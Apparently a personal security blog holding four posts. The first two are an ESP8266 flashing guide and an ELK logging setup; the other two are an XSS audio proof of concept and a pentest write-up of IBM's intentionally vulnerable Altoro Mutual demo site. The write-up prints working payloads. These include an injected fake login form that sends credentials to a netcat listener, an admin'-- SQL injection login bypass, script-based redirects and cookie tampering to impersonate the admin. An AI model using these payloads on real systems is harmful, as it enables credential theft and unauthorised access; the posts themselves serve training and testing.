Wednesday, March 2, 2016

IOT-ing with ESP8266

Update on May 26, 2016... yet another surprise from this board. After flashing, and for programming the board, I observed that TX on the USB converter has to be connected to TX on the ESP board, and likewise RX to RX. Yes, you typically pair TX with RX and vice versa, but not with this board.

I always find that nothing works the first time I try it... and playing with ESP8266 modules was not going to be the exception. This post therefore covers the steps that eventually made these modules work for me, as I haven't seen any other blog out there covering this board specifically. As you can see, it is an ESP8266-12 development board that comes with a battery holder (details of this device below in the last section).

The failures :(

Before purchasing the above module there were some failed attempts involving an ESP8266-1, an ESP8266-3 and an ESP8266-12. The "beauty" of these modules, and I guess of hardware-ish projects in general, is that the chance of failure is increased by physical factors: bad soldering, overheating, wrong connections, a faulty power source, manufacturing errors... yeah, I think I have been bitten by (and maybe learnt from) all of those. I leave a picture here of two defunct modules; they can still serve as an example/reference of how they can be assembled. I overheated the ESP8266-12, but I still feel proud that I was able to solder that many jumper wires somewhat nicely (they are male to male, plugged into that small white breadboard).

The success :)

In this section I will detail the steps I took and the config changes I made to start using the module; for a list of the tools I used/purchased have a look at the last section below.
Note this module comes with a pre-installed, somewhat shady (I would say) firmware that requires a mobile app to work. Some pages direct you to an APK that requests an excessive number of permissions to run; I would be wary of installing that APK on your phone. Therefore the first step I took was re-flashing. Note I am using Linux for flashing and Windows for programming.

  • Connect the wiring and jumper as follows:
    • 1: Ground from the USB to serial converter goes to GPIO0 (zero) of the ESP module; yes, this is required in addition to step 4.
    • 2: Make sure the USB to serial converter is set up to work at 3.3 volts.
    • 3: Double-check that RX on the USB to serial converter is connected to RX on the ESP module, and that TX on the converter is connected to TX on the ESP. (Yes, not the typical way of pairing TX and RX pins.)
    • 4: The jumper that comes with the ESP board should be plugged in for flashing.
    • 5: sorry, dummy number :)
    • 6: this will be used later; leave it disconnected for now.
    • *Instead of the recommended normal AA batteries I used rechargeable ones; I measured the output from the voltage regulator and it was providing the required 3.3 volts to the development board.
  • Obtain a fresh NodeMCU image to flash; I preferred this over the AT-command-based firmwares. I left the default basic modules proposed on the web site.
  • The exact image I flashed can be found here if you need it. Disclaimer: I don't work for any three-letter agency.
  • After the layout is ready and the USB to serial converter is connected to your computer it is time to proceed to flashing.
  • The Windows flasher tools didn't work for me, so I used a Kali Linux VMware Player virtual machine to run the script; make sure you attach the USB to serial converter to the VM in VMware.
  • Not surprisingly, esptool didn't work for me out of the box either; I was getting errors such as
warning: espcomm_send_command(FLASH_DOWNLOAD_DATA) failed
warning: espcomm_send_command: didn't receive command response 
  • However, after modifying its source so that it would flash with smaller block sizes, it worked. Check that the code contains the following:
    ESP_RAM_BLOCK   = 0x1800
    ESP_FLASH_BLOCK = 0x4 
  • As a preliminary check that esptool works, try the read_mac command. To do so, first restart the module (I typically do this by pulling a battery away from the coil in the battery holder and re-seating it) and execute the command highlighted below.
python esptool.py read_mac
Connecting...MAC: 18:fe:34:zz:yy:xx
  • If esptool manages to return the configured mac of your ESP module it means it communicated well with the device and you are ready to go with the flashing command as follows:
python esptool.py write_flash 0x00000 nodemcu-master-7-modules-2016-03-01-21-25-51-integer.bin
Erasing flash...
Took 2.10s to erase flash block
Wrote 397520 bytes at 0x00000000 in 574.7 seconds (5.5 kbit/s)...
  • It will take some time (because of the source code changes we made), but it should work.
  • Now it is time to test it! Turn off the ESP module and detach the USB to serial converter from VMware so that it is visible to your native Windows system (if you are using Windows; on Linux/Mac you can do this with minicom or another terminal emulator).
  • With the ESP module turned off, make the following changes to the physical wiring/connections to the device:
    • Remove the jumper marked with number 4 in the picture above.
    • Connect the pin marked as 6 to ground; in other words, the wire that was previously connected to GPIO0 (zero) should now be connected where number 6 points.
    • Verify that TX from the USB converter is connected to TX on the ESP module, and do the same with the RX connectors. Yes, this is not the typical way to connect them, but once again this board got me with that.
  • Once all the arrangements are done power on the ESP module.
  • Verify which COM port the USB to serial converter is connected to: go to the Windows Control Panel / Device Manager (the shortcut Windows Key + Pause gets you to Control Panel faster) and look at the Ports (COM & LPT) section.
  • Download the ESPlorer tool from here and run the bat file.
  • Once inside ESPlorer select the COM port (COM4 in my case), specify a 9600 baud speed and click the "Open" button. You should see something like the following and be able to write your first print("hello world") command.

  • Note: if you don't connect the ground wire, the ESP8266 module will ignore any command you send it... yeah, this was the last thing bothering me until I got it all working.
That's it, now you can go ahead and code whatever you need on it. Hopefully this guide was useful for you; in future posts I will try to cover some cool stuff you can do with modules like these.
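For reference, the block-size patch described above can be scripted. Here is a hedged sketch that demonstrates the sed edit on a stand-in snippet rather than the real esptool.py (the constant names come from esptool's source; 0x400 is, as far as I recall, its default flash block size):

```shell
# Stand-in for the two constants in esptool.py
cat > esptool_snippet.py <<'EOF'
ESP_RAM_BLOCK = 0x1800
ESP_FLASH_BLOCK = 0x400
EOF
# shrink the flash block size as described above
sed -i -E 's/^(ESP_FLASH_BLOCK[[:space:]]*=).*/\1 0x4/' esptool_snippet.py
grep 'ESP_FLASH_BLOCK' esptool_snippet.py   # prints: ESP_FLASH_BLOCK = 0x4
```

Run the same sed against your local copy of esptool.py if you prefer not to edit it by hand.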

The gear I used for success

The gear I used and what/where I purchased:

  • ESP8266-12 development board with battery holder. Link

  • USB to serial converter (FTDI FT232RL USB to TTL Serial Converter Adapter Module 5V + 3.3V) Link

  • Female to female jumper wire cables. Link

Monday, May 5, 2014

Elastic Security: Deploying Logstash, ElasticSearch, Kibana "securely" on the Internet

Hello folks!
Continuing the tradition of at least one post per year, I wanted to write about a pilot I built and keep refining, based on ElasticSearch (1.1.1), Logstash (1.4.0) and Kibana (3.0.1). I wanted to get my hands dirty with these, as I have increasingly seen traditional SQL-based security applications/tools fail when attempting to scale.

NoSQL databases and big data technologies are becoming a must if you want to properly take care of enterprise security, where you can receive large quantities of log data per day. With all three being Open Source and well supported, I decided to give them a try and put something together.

The pilot I will present here is a sort of "SSH scanners statistics" that will display several charts and a geo-location map based on the source IP address of systems scanning for open SSH ports on the Internet.

I have used only one ElasticSearch node, as I am just collecting traffic hitting port 22/TCP (SSH) on a VPS running Ubuntu 13.10 on top of OpenVZ. This meant/required implementing a bit of hardening so that it is bulletproof... well, never say never ;). The steps I took to put all this together are as follows:
  1. The first step is probably enabling SSH on a non-standard port so that your own SSH connections don't clutter the SSH logs. To do so simply edit your /etc/ssh/sshd_config and set the Port parameter to a number other than 22. Be mindful that your SSH connection will break when you do this and you'll have to reconnect. After acknowledging this, execute service ssh restart to restart SSH on the specified port.
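That edit can be scripted too; here is a hedged sketch performed on a stand-in copy of the file rather than the real /etc/ssh/sshd_config (2222 is just an example port):

```shell
# Demonstrate the Port edit on a stand-in copy of sshd_config
printf 'Port 22\nPermitRootLogin no\n' > sshd_config_demo
sed -i 's/^Port 22$/Port 2222/' sshd_config_demo
grep '^Port' sshd_config_demo   # prints: Port 2222
```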
  2. Enable iptables rules to log incoming traffic to the SSH port with this command on a root shell:
  3. iptables -A INPUT -p tcp -m tcp --dport 22 -j LOG --log-level 4 
  4. You may want to save this rule to make it persistent across reboots. To do so you can use the iptables-save and iptables-restore commands. A useful package is iptables-persistent; install it by running apt-get install iptables-persistent. It will generate a file at /etc/iptables/rules.v4 to which you can save your iptables changes so that they are restored after reboots:
  5. iptables-save>/etc/iptables/rules.v4
  6. Now, in order to store the logs generated by iptables in a specific file you need to edit your syslog server configuration file. In your /etc/syslog.conf file add the line:
    kern.warning /var/log/iptables.log
    In order for that file not to grow without control, create the following file: /etc/logrotate.d/iptables.
  7. /var/log/iptables.log {
            rotate 7
            daily
            compress
            missingok
            notifempty
    }
  8. Check that the rule is working by attempting to connect to your box on port 22. A simple way to do this would be using telnet:
    telnet <server_ip> 22
    Your /var/log/iptables.log file should contain the corresponding logs resembling something like the below
    May  3 17:20:08 host kernel: [742317.869535] IN=venet0 OUT= MAC= SRC= DST=A.B.C.D LEN=60 TOS=0x00 PREC=0x00 TTL=62 ID=51695 DF PROTO=TCP SPT=36333 DPT=22 WINDOW=14600 RES=0x00 SYN URGP=0
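As a quick aside, the interesting fields can be pulled out of such a line with standard shell tools before any logstash is involved; a hedged example (the sample line and the IP in it are made up):

```shell
# Extract source IP and destination port from an iptables log line
line='May  3 17:20:08 host kernel: [742317.869535] IN=venet0 OUT= MAC= SRC= DST= LEN=60 TOS=0x00 PREC=0x00 TTL=62 ID=51695 DF PROTO=TCP SPT=36333 DPT=22 WINDOW=14600 RES=0x00 SYN URGP=0'
src=$(printf '%s\n' "$line" | grep -oE 'SRC=[0-9.]+' | cut -d= -f2)
dpt=$(printf '%s\n' "$line" | grep -oE 'DPT=[0-9]+' | cut -d= -f2)
echo "$src scanned port $dpt"   # prints: scanned port 22
```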
  10. Let's now get the tools we need. I recommend grabbing the deb files from the elasticsearch official site, as they include the init.d start/stop scripts. Note that these packages require a Java runtime, so it is worth installing openjdk-7-jdk and openjdk-7-jre-headless. All the described activities are performed as follows:
  11. apt-get install openjdk-7-jdk openjdk-7-jre-headless
    //example of grabbing the deb file for elasticsearch, note you will also need logstash deb file and Kibana (Kibana comes in a zipped or tar file)
    //the below command installs a deb file; you will need to do the same for the logstash deb file
    dpkg -i elasticsearch-1.1.1.deb
  12. To run, stop or restart logstash and elasticsearch once they are installed you can use /etc/init.d/logstash [start|stop|restart|status] or the elasticsearch equivalent. Note that to have them start automatically after any system reboot you will need to enable them via the update-rc.d command.
  13. update-rc.d elasticsearch defaults 95 10
    update-rc.d logstash defaults
  14. Note that if your machine runs on top of an OpenVZ node, the Elasticsearch start script may fail stating sysctl: permission denied on key 'vm.max_map_count'. My quick and dirty solution for this was commenting out the offending lines in the /etc/init.d/elasticsearch init script.
  15. #       if [ -n "$MAX_MAP_COUNT" ]; then
    #               sysctl -q -w vm.max_map_count=$MAX_MAP_COUNT
    #       fi
  16. Once the services are running, if you issue a netstat command you will notice elasticsearch listening for incoming connections from anywhere on two different ports.
  17. netstat -putan | grep LISTEN
    tcp        0      0 :::9200          :::*             LISTEN      5420/java
    tcp        0      0 :::9300          :::*             LISTEN      5420/java
  18. We obviously don't want this behaviour, so below we will make the following change so that elasticsearch only listens on the loopback interface, a.k.a. localhost. In the file /etc/elasticsearch/elasticsearch.yml enable/uncomment the network.host line and point it at localhost:
  19. network.host:
  20. Now, after restarting the services, if we issue netstat again we will see elasticsearch listening on the loopback interface only:
  21. netstat -putan | grep LISTEN
    tcp        0      0*        LISTEN      5420/java
    tcp        0      0*        LISTEN      5420/java
  22. Let's take care of the logstash piece before jumping into the presentation layer (Apache & Kibana). Logstash will be the agent feeding log information to elasticsearch. Let's see how we can tell logstash to store our iptables logs in elasticsearch. Create the file /etc/logstash/conf.d/geoiptables.conf.
  23. input {
    #this file contains the iptables logs as defined in our syslog.conf file.
            file {
                    path => [ "/var/log/iptables.log" ]
                    type => "iptables"
            }
    }
    filter {
            if [type] == "iptables" {
                    grok {
    #See next bullet below for the contents of /usr/share/grok/patterns
                            match => { "message" => "%{IPTABLES}" }
                            patterns_dir => ["/usr/share/grok/patterns"]
                    }
            }
            if [src_ip] {
                    geoip {
                            source => "src_ip"
                            target => "geoip"
    #This should be shipped in the deb file we downloaded.
                            database => "/opt/logstash/vendor/geoip/GeoLiteCity.dat"
    #note that the below field additions and mutations are required for Kibana to properly plot the information.
                            add_field => [ "[geoip][coordinates]", "%{[geoip][longitude]}" ]
                            add_field => [ "[geoip][coordinates]", "%{[geoip][latitude]}" ]
                    }
                    mutate {
                            convert => [ "[geoip][coordinates]", "float" ]
                    }
            }
    }
    output {
    #we leave this so that when we debug running logstash from the command line we can see the output that will be stored in elasticsearch
            stdout {
                    codec => rubydebug
            }
    #again for security purposes our elasticsearch installation only runs on localhost.
            elasticsearch {
                    protocol => "http"
                    host => ""
            }
    }
  24. Note that for my purposes I used the pre-built iptables regex snippet available at the address you will see below. However, it did not work out of the box, as my iptables logs contain neither the MAC address nor the outgoing interface. Therefore, I created the file /usr/share/grok/patterns/iptables and modified it as follows (basically stating that those fields are optional with the "?" symbol).
  25. # Source :
    NETFILTERMAC %{COMMONMAC:dst_mac}:%{COMMONMAC:src_mac}:%{ETHTYPE:ethtype}
    ETHTYPE (?:(?:[A-Fa-f0-9]{2}):(?:[A-Fa-f0-9]{2}))
    IPTABLES1 (?:IN=%{WORD:in_device} OUT=(%{WORD:out_device})? MAC=(%{NETFILTERMAC})? SRC=%{IP:src_ip} DST=%{IP:dst_ip}.*(TTL=%{INT:ttl})?.*PROTO=%{WORD:proto}?.*SPT=%{INT:src_port}?.*DPT=%{INT:dst_port}?.*)
    IPTABLES2 (?:IN=%{WORD:in_device} OUT=(%{WORD:out_device})? MAC=(%{NETFILTERMAC})? SRC=%{IP:src_ip} DST=%{IP:dst_ip}.*(TTL=%{INT:ttl})?.*PROTO=%{INT:proto}?.*)
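The effect of those "?" markers can be seen with a plain egrep approximation; note this regex is a simplified stand-in for the grok pattern above, not the pattern itself:

```shell
# MAC value made optional, as in the modified pattern; both log shapes now match
re='IN=[a-z0-9]+ OUT=[a-z0-9]* MAC=([0-9a-fA-F:]+)? SRC='
echo 'IN=venet0 OUT= MAC= SRC=' | grep -qE "$re" && echo 'matches without MAC'
echo 'IN=eth0 OUT= MAC=aa:bb:cc:dd:ee:ff:11:22:33:44:55:66:08:00 SRC=' | grep -qE "$re" && echo 'matches with MAC'
```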
  26. Let's start logstash from the command line to verify it is all working without errors. To do so you need to issue /opt/logstash/bin/logstash -f /etc/logstash/conf.d/geoiptables.conf. You should see an output like this:
  27. Using milestone 2 input plugin 'file'. This plugin should be stable, but if you see strange behaviour, please let us know! For more information on plugin milestones, see {:level=>:warn}
           "message" => "May  5 09:55:37 host kernel: [888446.478915] IN=venet0 OUT= MAC= SRC= DST= LEN=60 TOS=0x00 PREC=0x00 TTL=50 ID=29355 DF PROTO=TCP SPT=51955 DPT=22 WINDOW=14600 RES=0x00 SYN URGP=0 ",
          "@version" => "1",
        "@timestamp" => "2014-05-05T13:55:37.658Z",
              "type" => "iptables",
              "host" => "host",
              "path" => "/var/log/iptables.log",
         "in_device" => "venet0",
            "src_ip" => "",
            "dst_ip" => "",
             "proto" => "TCP",
          "src_port" => "51955",
          "dst_port" => "22",
             "geoip" => {
                        "ip" => "",
             "country_code2" => "GB",
             "country_code3" => "GBR",
              "country_name" => "United Kingdom",
            "continent_code" => "EU",
                  "latitude" => 50.5,
                 "longitude" => -0.14999999999999545,
                  "timezone" => "Europe/London",
                   "location" => [
                [0] -0.12999999999999545,
                [1] 51.5
            ],
                "coordinates" => [
                [0] -0.12999999999999545,
                [1] 51.5
            ]
    }
}
  28. This means everything is working fine: the information is correctly parsed by logstash and stored in elasticsearch. Now you should be ready to stop the logstash command line with Ctrl+C and start the daemon with /etc/init.d/logstash start. See the troubleshooting section below if you run into issues.
  29. If you haven't done so yet, install apache2 with apt-get install apache2. Let's apply a bit of hardening to it by modifying the file /etc/apache2/conf-enabled/security.conf
  30. #Edit the file: /etc/apache2/conf-enabled/security.conf
    ServerTokens Prod
    ServerSignature Off
    TraceEnable Off
  31. We won't be exposing the Kibana front-end to everyone on the Internet: we will enable basic authentication and SSL, to prevent attackers from easily sniffing the credentials/session information. To take care of the basic auth piece we just need to generate the htpasswd file with:
  32. htpasswd -c /etc/htpasswd <username>
  33. For the SSL piece we will self-generate a certificate (ideally you would buy one, or generate one signed by your CA of choice and trusted by your browser).
  34. mkdir /etc/apache2/ssl
    openssl req -x509 -nodes -days 99999 -newkey rsa:2048 -keyout /etc/apache2/ssl/apache.key -out /etc/apache2/ssl/apache.crt
    //respond to the questions as requested
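If you prefer to skip the interactive questions, the certificate subject can be passed on the command line; a hedged variant (the -subj values are made up, and the paths here point at a scratch directory instead of /etc/apache2/ssl):

```shell
# Non-interactive self-signed certificate generation (scratch paths for the demo)
mkdir -p /tmp/apache-ssl-demo
openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
    -subj '/C=XX/CN=kibana.example.local' \
    -keyout /tmp/apache-ssl-demo/apache.key \
    -out /tmp/apache-ssl-demo/apache.crt 2>/dev/null
openssl x509 -in /tmp/apache-ssl-demo/apache.crt -noout -subject
```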
  35. We will need to enable several Apache modules as follows
  36. a2enmod ssl
    a2enmod proxy
    a2enmod proxy_http
    a2enmod auth_basic
    a2enmod rewrite
  37. Finally we should create an Apache site configuration to tie this all together. Create it at /etc/apache2/sites-available/kibana.conf and enable it afterwards using the a2ensite command.
  38. #file /etc/apache2/sites-available/kibana.conf
    <IfModule mod_ssl.c>
    <VirtualHost *:443>
            SSLEngine on
            SSLCertificateFile      /etc/apache2/ssl/apache.crt
            SSLCertificateKeyFile /etc/apache2/ssl/apache.key
            ServerAdmin webmaster@localhost
            DocumentRoot /var/www
    #this allows end user -> reverse proxy -> query the locally listening elasticsearch
            ProxyPreserveHost On
            ProxyPass /kibana2/ http://localhost:9200/
            ProxyPassReverse /kibana2/ http://localhost:9200/
            <Directory /var/www>
                    AllowOverride None
                    AuthType basic
                    AuthName "private"
                    AuthUserFile /etc/htpasswd
                    Require valid-user
            </Directory>
            ErrorLog ${APACHE_LOG_DIR}/error.log
            CustomLog ${APACHE_LOG_DIR}/access.log combined
    </VirtualHost>
    </IfModule>
  39. You may also want to either disable port 80/tcp or create a redirect to port 443/tcp as follows. Create the file /etc/apache2/sites-available/redirect2ssl.conf and later enable it with a2ensite.
  40.         <VirtualHost *:80>
            RewriteEngine on
            RewriteCond %{SERVER_PORT} !^443$
            RewriteRule ^/(.*) https://%{HTTP_HOST}/$1 [NC,R,L]
            ErrorLog ${APACHE_LOG_DIR}/error.log
            CustomLog ${APACHE_LOG_DIR}/access.log combined
    </VirtualHost>
  41. Let's not forget about downloading Kibana and setting it up for our needs.
  42. //Kibana comes as a tar file, so untar it and move its contents to /var/www/kibana
    tar -xzvf kibana-3.0.1.tar.gz
    mkdir -p /var/www
    mv kibana-3.0.1 /var/www/kibana
    //allow apache to serve it
    chown -R www-data: /var/www/kibana
    //now edit the file /var/www/kibana/config.js and make this change (note the https:// and the kibana2 path, which will be handled by the Apache proxy module)
    elasticsearch: "https://"+window.location.hostname+"/kibana2",
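That config.js edit can also be scripted; a hedged sketch on a stand-in copy of the file (the original line shown is, to the best of my knowledge, Kibana 3's stock default):

```shell
# Demonstrate the config.js change on a stand-in file
cat > config_demo.js <<'EOF'
elasticsearch: "http://"+window.location.hostname+":9200",
EOF
sed -i 's|"http://"+window.location.hostname+":9200"|"https://"+window.location.hostname+"/kibana2"|' config_demo.js
cat config_demo.js
```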
  43. After Kibana has been set up, let's connect to it by browsing to https://<your_server>/kibana. You should be prompted for the username and password we set up with the htpasswd command, and then you should see something like the following.
  44. Now click the link where it says You can access it here to load the default logstash interface. The default view shows a nice time picker with your log lines below, similar to an expensive Splunk interface, but free in this case :D
  45. If you scroll down to the bottom you will see a button that says Add a row; a row is the container in which we will place our panels (the maps and charts) for the iptables log information. Go to the Rows tab, give the new row a Title and a Height (650px will do), then click Create Row.
  46. At the bottom you should now see the new row, to which we will add the map panel. Click the Add Panel green button and select Bettermap. Give it a Title, for instance SSH Scanners. For the Coordinate Field write geoip.coordinates; for the span (horizontal size), selecting 9 should be fine; finally click Save.
  47. The charts are also pretty straightforward. Similarly to how we added the map, this time choose a terms panel, give it a Title such as Scanning Countries, for the Field select geoip.country_name, set the style to pie, then click Save.

That's all folks!


  • I have noticed logstash's verbosity is not that good when there are errors parsing the log files. Some helpful tips:
  • Run logstash from the command line (explained in this post) with the stdout output plugin enabled.
  • Check the logs in /var/log/logstash.log
  • Logs that fail parsing will still be stored in elasticsearch, but tagged with _grokparsefailure; when you observe this, don't think it is an error on the elasticsearch side, revise the logstash configuration file for glitches.
  • If you are using syslog-ng, make sure you configure the owner and group of the files so that logstash can read them. Otherwise you will get a failed to open /var/log/iptables.log: Permission denied error in /var/log/logstash/logstash.log.
  • #file /etc/syslog-ng/syslog-ng.conf
    destination d_kern { file("/var/log/iptables.log" owner("logstash") group("adm") perm(0660)); };
  • If you modify your logstash configuration, be careful to respect where the configuration stanzas require double quotes, brackets and square brackets.


Monday, July 15, 2013

Blind Site Scripting

Alexis and I were having a bright moment after siesta time and decided to put into practice a "brand new" attack... well, probably somebody has already done this, but at least we haven't seen it out there before. As usual it had to be something fun, and probably silly, to keep us motivated.

Ladies and gentlemen, please welcome "Blind Site Scripting", a.k.a. BSS! ... never before has XSS talked to its victims!

Here is the PoC; it needs Firefox and speakers on (tested on Firefox 29.0 on May 3rd, 2014):<h1>Blind Site Scripting!</h1><script>var audio = new Audio();audio.src ='';audio.loop=true;;</script>

The video showing Blind Site Scripting in action:

Feel free to edit the text following the "text" parameter above. Of course, you can embed sound files directly, like in the example below:<h1>Blind Site Scripting!</h1><script>var audio = new Audio();audio.src =' Macarena.mp3';audio.loop=true;;</script>

So, as you can see, using text-to-speech or recorded files we can play audio and use it as a payload in our XSS scenarios, thanks to HTML5 features such as the Audio element.

Some additional notes/disclaimers:
  • Of course, you must first find an XSS-vulnerable page. Here we are using IBM's AppScan vulnerable site.
  • You would also need a text-to-speech service; I know the one used here will go down at some point and the PoC won't work.
  • Tested on Firefox. IE and Chrome would block non-obfuscated XSS like this.
  • If it doesn't work, I am sure you will make it work eventually... this is not rocket science :)

Sunday, December 12, 2010

A glance at Altoro Mutual

* A robots.txt file was not found, but the error page reveals Microsoft Internet Information Services in use. Robots files sometimes expose juicy information.

* Server headers provide quite a lot of information: underlying technologies, versions, and a suspicious second cookie named “amSessionId”.

* While performing the test I stumbled by chance upon this Google reply, which includes the X-XSS-Protection header with a value of 0; this causes IE 8 to allow displaying XSS-suspicious content. There is some debate about this protection mechanism, as it is said to block some benign content, which may be why Google includes this header. The X-Content-Type-Options header set to nosniff is another IE8-related header that helps mitigate certain attacks based on MIME type abuse.
* Sometimes you can get interesting information from content metadata; in this case, for example, we see that the images have been edited with Photoshop 3.0. On other occasions one can get usernames and similar material to be used in the engagement.
* The main search function is vulnerable to XSS.
Here is the cookie; the ASP.NET cookie has not been revealed because of the httponly flag, which prevents JavaScript from accessing the cookie.
A more elaborate attack can be performed as follows. First, inject the following string, which will display a fake login page to trick the user (victim).;)%3Ch1%3E%3Cdiv%20background-color%3A%23FF3300%3E%3Cform+action%3D%E2%80%9Dhttp%3A%2F%2F127.0.0.1%2Fevil.php%E2%80%9D%3EUsername%3A%3Cbr%3E%3Cinput+type%3D%E2%80%9Dtext%E2%80%9D+name%3D%E2%80%9Duser%E2%80%9D%3E%3Cbr%3EPassword%3A%3Cbr%3E%3Cinput+type%3D%E2%80%9Dtext%E2%80%9D+name%3D%E2%80%9Dpass%E2%80%9D%3E%3Cbr%3E%3Cinput+type=SUBMIT%20value=%22login%22%20/%3E%3C/form%3E%3C/div%3E
We set up a listening socket, with netcat in this example.
The user will then input his user and password.
And the attacker therefore captures them.
If we wanted to provide more impressive results we can start Beef exploitation framework in order to control a victim’s browser.
* The way the application locates content seems vulnerable to path traversal. The application seems happy to serve html files, but when the parameter is manipulated an unfiltered error is displayed with interesting information.
Insecure redirection and remote file inclusion were also tested, with no luck.
The attack (insecure redirection) seems possible here:
Abusing the URL like this:
* But a warning message appears, which is itself vulnerable to injection, so we can still perform the redirection.;<script>document.location="";</script>
* In the subscription feature they check client-side what characters the user is introducing, but not server-side, leading to an error.
* Therefore, by introducing a "'" we get a nice database error that could derive into a SQL Injection attack.
There seems to be an underlying insert clause, but it does not respond as expected to Boolean clauses.
We could try to perform additional SQL commands by appending a ";drop database", but it wouldn't be fair to Altoro. Again, there is an XSS here.
* Again we have another Cross Site Scripting in a message:
* They do not mark the field with the autocomplete=off attribute; here it is not so dangerous, but it is in login forms.
* Directory indexing misconfiguration has been located with sensitive information:
* There is a local reference to a file that also reveals a user name:
* In the feedback form there is also another XSS.
* Incomplete web page coding, leaving the page lacking functionality, can impact the public image of the bank. The button does not work, as the html form does not even have an action attribute defined.
* Login information is transmitted in clear text:
* It reveals when a username is not in the system, which can ease brute-forcing attacks on the username field.
We see admin works, so we just have to concentrate on the password.
* It seems vulnerable to a SQL Injection attack.
It is very easy to circumvent the login page given the behaviour previously exposed by the web page; we just have to use the following:
· User: "admin'--" (exclude the double quotes).
· Password: whatever, as it is going to be ignored because of the "--" symbols, which comment out the rest of the line in SQL.
We see we have logged in with the admin account:
* By the way, easy password guessing shows that we can log in with admin/admin credentials.
We see that the admin login is in fact an administration menu of the application, in which we could change other users' passwords and thus log in as them as well.
Changing a user's password does not seem to work (to avoid abuse from pentesters, I guess) but usernames are valuable for access via the "--" technique.
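To visualise what the server likely ends up executing with that username, here is a hedged sketch; the query shape is invented for illustration, as we obviously can't see Altoro's real backend:

```shell
# The '--' in the username comments out the rest of the (hypothetical) SQL statement
user="admin'--"
pass="whatever"
printf "SELECT * FROM users WHERE name='%s' AND pass='%s'\n" "$user" "$pass"
# prints: SELECT * FROM users WHERE name='admin'--' AND pass='whatever'
# everything after -- is treated as a comment, so the password check vanishes
```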
* There is another directory indexing vulnerability
* There is a web service (not authenticated).
It contains the web service method definitions and the soap messages needed:
This can be attacked to obtain usernames by means of soap messages, and possibly to perform XML injection attacks.
A captcha exists as well, to prevent malicious users from brute-forcing the password field with automated tools:
* In the captcha window source code we see a password in an html comment:
With this info and the captcha number we can successfully log in.
* A possible XML/XPATH injection exists:
With this we would obtain the first item.
By crafting a more complex syntax we could, for example, recursively retrieve the rest of the items. The contents are anyway indexed and available:
* A header injection vulnerability exists that allows modifying the page returned by the server.
* Regarding session management, we show below the admin and sjoe cookies to detect possible vulnerabilities:
- admin cookie
Cookie: ASP.NET_SessionId=35f2wi55vpoyoyrg0ve54szg; amSessionId=446643804; amUserInfo=UserName=YWRtaW4=&Password=YWRtaW4=; amUserId=1
- sjoe cookie
Cookie: ASP.NET_SessionId=hvejm345qencll55npbtsqe0; amSessionId=582146246; amUserInfo=UserName=c2pvZSctLQ==&Password=bmFkYQ==; amUserId=100116013; amCreditOffer=CardType=Platinum&Limit=12000&Interest=5.4
We can highlight the following weaknesses:
· Username and password information is resent on every query; this should only happen when logging in, and the server session context should maintain this information afterwards.
· A suspicious amUserId is all that is used to differentiate one user from another, see image below.
· Special offers are set on the client side by means of amCreditOffer, CardType and Limit.
· The seemingly hashed information contained in the username or password is just base64 encoding, so it is easy to intercept and reverse (c2pvZSctLQ== translates to sjoe'--).
* Having logged in as the sjoe user, we just have to request a privileged page and modify sjoe's amUserId field, setting it to admin's (1), and we can access that critical page impersonating the admin user.
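Decoding those cookie fields needs nothing more than the base64 tool:

```shell
# The amUserInfo values are plain base64, not hashes
echo 'YWRtaW4=' | base64 -d; echo       # prints: admin
echo 'c2pvZSctLQ==' | base64 -d; echo   # prints: sjoe'--
```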